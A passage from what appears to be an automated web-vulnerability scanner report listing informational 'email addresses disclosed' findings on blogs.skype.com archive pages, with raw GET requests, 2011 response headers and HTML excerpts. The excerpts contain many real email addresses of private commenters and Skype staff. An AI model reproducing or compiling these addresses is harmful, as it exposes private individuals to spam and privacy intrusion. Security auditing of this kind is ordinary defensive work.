am will be attending and trying to squeeze in as many meetings as possible. If your company is attending the event and would like to meet up with someone from Skype, please let me know here, or email [partnermarketing@skype.net](mailto:partnermarketing@skype.net)</p>
...[SNIP]...

20.14. http://blogs.skype.com/en/2006/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/04/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2006/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:43 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 250170
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
felix@nineteentwentynine.co.uk<br />
...[SNIP]...
<scott.indrisek@skype.net>
...[SNIP]...
<p>Jeez. blanton@mac.com<br />
...[SNIP]...
<scott.indrisek@skype.net>
...[SNIP]...

20.15. http://blogs.skype.com/en/2006/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/05/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2006/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:41 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 790051
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
g using SkypeCasts for our meetings. Skype has been great for us Al-Anon members who live in areas where there are no face to face meetings available. You can find out more at alanonskype.org or email contact@alanonskype.org This is an experimental meeting that is not as yet recognised by the Al-Anon World Service Office."</p>
...[SNIP]...
<p>Email to : larrylee@neloco.com</p>
...[SNIP]...
<p>Email Me,, kp@gate.net</p>
...[SNIP]...

20.16. http://blogs.skype.com/en/2006/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/06/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2006/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:39 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 451171
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>Contact me on Skype (indrisek), or send an email to 'scott.indrisek@skype.net' with the words EXPAT IN AMERICA in the subject line.</p>
...[SNIP]...
<br />
imcoocoo@gmail.com<br />
or<br />
jbratcher4@tampabay.rr.com</p>
...[SNIP]...

20.17. http://blogs.skype.com/en/2006/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/07/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2006/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:37 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 338410
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<a href="mailto:sindrisek@kaplowpr.com">
...[SNIP]...
rs to help us provide the best hardware available for Mac users to have great quality video calls. If you would like to get involved or let us know what you have planned for Mac, please [email](mailto:partnermarketing@skype.net) us.</p>
...[SNIP]...
<br />
This is jss@netcodec.com in Korea.<br />
...[SNIP]...
<p>jss@netcodec.com<br />
...[SNIP]...
<research@skype.net>
...[SNIP]...

20.18. http://blogs.skype.com/en/2006/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/08/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2006/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:35 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 371498
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
akbar_2004@hotmail.com</p>
...[SNIP]...
<happybirthday@skype.net>
...[SNIP]...
<a href="mailto:sindrisek@kaplowpr.com">
...[SNIP]...
<br />
As part of a 6-yr ICT research project, I'm keen to find out if different nationalities/ cultures use blogs & skype in the same way. Any info or links, let me know ... jessicalichy@wanadoo.fr </p>
...[SNIP]...
<br />
email me please at clouds_are_free@yahoo.com</p>
...[SNIP]...
<p>if i get a sony mylo will i be able to make outskype calls for free or will that expire because thats one of the main resons why i'm buying it please send me an email at dax6000@aol.com if you can tell me</p>
...[SNIP]...
<p>if i get a sony mylo will i be able to make outskype calls for free or will that expire because thats one of the main resons why i'm buying it please send me an email at dax6000@aol.com if you can tell me</p>
...[SNIP]...
<p>if i get a sony mylo will i be able to make outskype calls for free or will that expire because thats one of the main resons why i'm buying it please send me an email at dax6000@aol.com if you can tell me</p>
...[SNIP]...
<p>if i get a sony mylo will i be able to make outskype calls for free or will that expire because thats one of the main resons why i'm buying it please send me an email at dax6000@aol.com if you can tell me</p>
...[SNIP]...

20.19. http://blogs.skype.com/en/2006/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/09/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2006/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:33 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 248309
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<a href="mailto:sindrisek@kaplowpr.com">
...[SNIP]...

20.20. http://blogs.skype.com/en/2006/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/10/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2006/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:32 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 198595
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<a href="mailto:sindrisek@kaplowpr.com">
...[SNIP]...
<br />
piero@durres.nl<br />
...[SNIP]...

20.21. http://blogs.skype.com/en/2006/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/11/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2006/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:30 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 351504
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
(ukphonesnetworkltd@excite.com)<br />
(ukphonesnetworkltd@graffiti.net)<br />
...[SNIP]...

20.22. http://blogs.skype.com/en/2006/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/12/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2006/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:28 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 288676
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>Please feel free to email me at: holykow@hotmail.com<br />
...[SNIP]...
<br />
If you are interested please contact me at: solangecifre@yahoo.com.ar<br />
...[SNIP]...
<br />
sheamusj@gmail.com<br />
...[SNIP]...
<a href="mailto:wallpaper@skype.net">wallpaper@skype.net</a>
...[SNIP]...
<img src="http://download.skype.com/share/emoticons/0101-sadsmile.png" alt=":(" /> Where I can find them? What I must to do to get my users????? Help me... my mail: vgarkul@gmail.com or skype: malish302</p>
...[SNIP]...

20.23. http://blogs.skype.com/en/2007/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/01/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2007/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:27 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 242360
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
cnj54@aol.com</p>
...[SNIP]...
<a href="mailto:sindrisek@kaplowpr.com">
...[SNIP]...

20.24. http://blogs.skype.com/en/2007/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/02/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2007/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:25 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 165110
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
email serve.tony@gmail.com<br />
...[SNIP]...

20.25. http://blogs.skype.com/en/2007/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/03/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2007/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:24 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 228535
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>moaar@webspeed.dk<br />
...[SNIP]...
<p>Send an introductory email to [resellers@skype.com](maito://resellers@skype.com) and include a summary of your business and an overview of your client base. We are looking for partners with large networks of business users who the Skype offering will appeal to.</p>
...[SNIP]...
<br />
My e-mail marchen@rambler.ru<br />
...[SNIP]...
<br />
My email is LLekhoathi@yahoo.com<br />
...[SNIP]...
<a href="mailto:antoine.bertout@skype.net">
...[SNIP]...
ge my username davidzodiac as this was put in hastily without realising that the user can not ever change this (quote: support) Why can't I request this be deleted and I be allowed to register afresh? ThankyouDavid_waters@talktalk.net</p>
...[SNIP]...

20.26. http://blogs.skype.com/en/2007/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/05/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2007/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:22 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 262371
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<peter.jones@skype.net>
...[SNIP]...

20.27. http://blogs.skype.com/en/2007/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/06/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2007/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:20 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 204711
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
call me plase=q8m20022@YAHOO.COM<br />
...[SNIP]...
<p>hi please help me i am trying to create my own skype cast but every time i try am join it as host i am told that i need the latest verion of which i have got please help me robert.gillan@hotmail.com</p>
...[SNIP]...
<br />
r.juyal@gmail.com<br />
...[SNIP]...

20.28. http://blogs.skype.com/en/2007/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/07/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2007/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:19 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 170679
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
should you be able to respond, please drop me a mail per:- campogirl@googlemail.com<br />
...[SNIP]...

20.29. http://blogs.skype.com/en/2007/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/08/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2007/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:17 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 617800
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
please .. pleaseeeeeeeee email me ( prinz_of_pazzion@yahoo.com )<br />
...[SNIP]...
<br />
These is Francis of SELL LIMITED.I have a good news for you.I want you to buy your phones,ipod,mp3 player,laptop at a very cheap price .If you have interest email us at (sellltd1@hotmail.com) (sellltd1@yahoo.com).The goods price are place bellow. Thanks for your inquiry.<br />
...[SNIP]...
<br />
Nokia N91 210 (sellltd1@hotmail.com) <br />
Nokia N90 200$ (sellltd1@yahoo.com)<br />
...[SNIP]...
<br />
Nokia Vertu 155$ (sellltd1@hotmail.com)<br />
(sellltd1@yahoo.com)<br />
...[SNIP]...
<br />
(sellltd1@yahoo.com) (sellltd1@hotmail.com) <br />
(sellltd1@hotmail.com) (sellltd1@yahoo.com)</p>
...[SNIP]...
<p>(sellltd1@yahoo.com) (sellltd1@hotmail.com) <br />
(sellltd1@hotmail.com) (sellltd1@yahoo.com)</p>
...[SNIP]...
esday, since this happened, I cannot log on to skype, skype shows it is trying to connect, but never does, is this due to the earthquake or is their another issue. Please advise me, Best Regards, Rick jj6850d@msn.com</p>
...[SNIP]...
ess... how come? Also i re installed as thought a problem... but still no access how long is this going to take to resolve this error or is there something i should know or do?? Any help please assist raycologne@web.de </p>
...[SNIP]...
<br />
My e-mail marchen@rambler.ru<br />
...[SNIP]...

20.30. http://blogs.skype.com/en/2007/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/10/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2007/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:14 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 134252
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
am calling. the other party can see me fine. i have installed and reinstalled skype and the logitech software, but no luck. the camera works perfectly outside of skype. can someone help? my email is howards@comcast.net thanks.</p>
...[SNIP]...

20.31. http://blogs.skype.com/en/2007/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/11/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2007/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:13 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 137689
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<em>sichange@skype.net</em>
...[SNIP]...
<em>sales@geonum.co.uk</em>
...[SNIP]...

20.32. http://blogs.skype.com/en/2008/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/01/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2008/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:12 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 125026
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
Thanx...Jay...Contact me on: matrix.3041@hotmail.com</p>
...[SNIP]...

20.33. http://blogs.skype.com/en/2008/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/04/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2008/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:09 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 216000
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
When I search on my email address [rjfarr@attglobal.net] it links to my Skype account, BUT STILL I AM NOT ABLE TO LOGON</p>
...[SNIP]...
<br />
Email - uxio69@hotmail.com<br />
...[SNIP]...
<br />
Cristina.dumitru@publicationweb.com</p>
...[SNIP]...
<br />
vanessaspcosta@yahoo.com.br<br />
...[SNIP]...
<br />
vanessaspcosta@yahoo.com.br<br />
...[SNIP]...

20.34. http://blogs.skype.com/en/2008/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/06/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2008/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:06 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 351318
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>carelpedre Again, I did not intend to ask. I need to add credits to my skype. Please donate on my paypal: pedrecarel@gmail.com</p>
...[SNIP]...
<br />
Hydroclean hydroclean@hydroclean.com.br </p>
...[SNIP]...
<br />
Hydroclean hydroclean@hydroclean.com.br </p>
...[SNIP]...
<br />
jadermar@terra.com.br<br />
...[SNIP]...
<br />
Hydroclean hydroclean@hydroclean.com.br </p>
...[SNIP]...
<br />
Hydroclean hydroclean@hydroclean.com.br </p>
...[SNIP]...
<br />
jadermar@terra.com.br<br />
...[SNIP]...
<br />
Hydroclean hydroclean@hydroclean.com.br </p>
...[SNIP]...
<br />
Hydroclean hydroclean@hydroclean.com.br </p>
...[SNIP]...
<br />
jadermar@terra.com.br<br />
...[SNIP]...
<br />
Hydroclean hydroclean@hydroclean.com.br </p>
...[SNIP]...
<br />
Hydroclean hydroclean@hydroclean.com.br </p>
...[SNIP]...
<br />
jadermar@terra.com.br<br />
...[SNIP]...

20.35. http://blogs.skype.com/en/2008/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/07/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2008/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:05 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 138815
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
Email - uxio69@hotmail.com<br />
...[SNIP]...
<p>I urge SKYPE to contact me via e-mail: m_bfly@hotmail.com!<br />
...[SNIP]...
<p>I am a skype user and read your concern about support. Could you try this address? : support@skype.net</p>
...[SNIP]...

20.36. http://blogs.skype.com/en/2008/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/09/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2008/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:02 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 132877
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</a> (up until August 31st), please send an e-mail to hahaha@skypelaughterchain.com, including your name, Skype ID, the country you currently live in and 2 pictures of yourself so we can identify you in the chain. Please get back to us by September 30th to claim your voucher.<br />
...[SNIP]...

20.37. http://blogs.skype.com/en/2008/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/10/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2008/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:01 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 248998
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>if anyone has any help they can offer please email at info@opulentfinancial.net </p>
...[SNIP]...

20.38. http://blogs.skype.com/en/2009/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/03/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2009/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:55 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 527797
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>if so please email detholm@comcast.net thanks alot! </p>
...[SNIP]...
till have Internet and app store, I've had skype working on this network before but about a week ago after I updated to the latest version it started doing this. If you need to contact me, my email is darryn89@live.com cheers</p>
...[SNIP]...
<br />
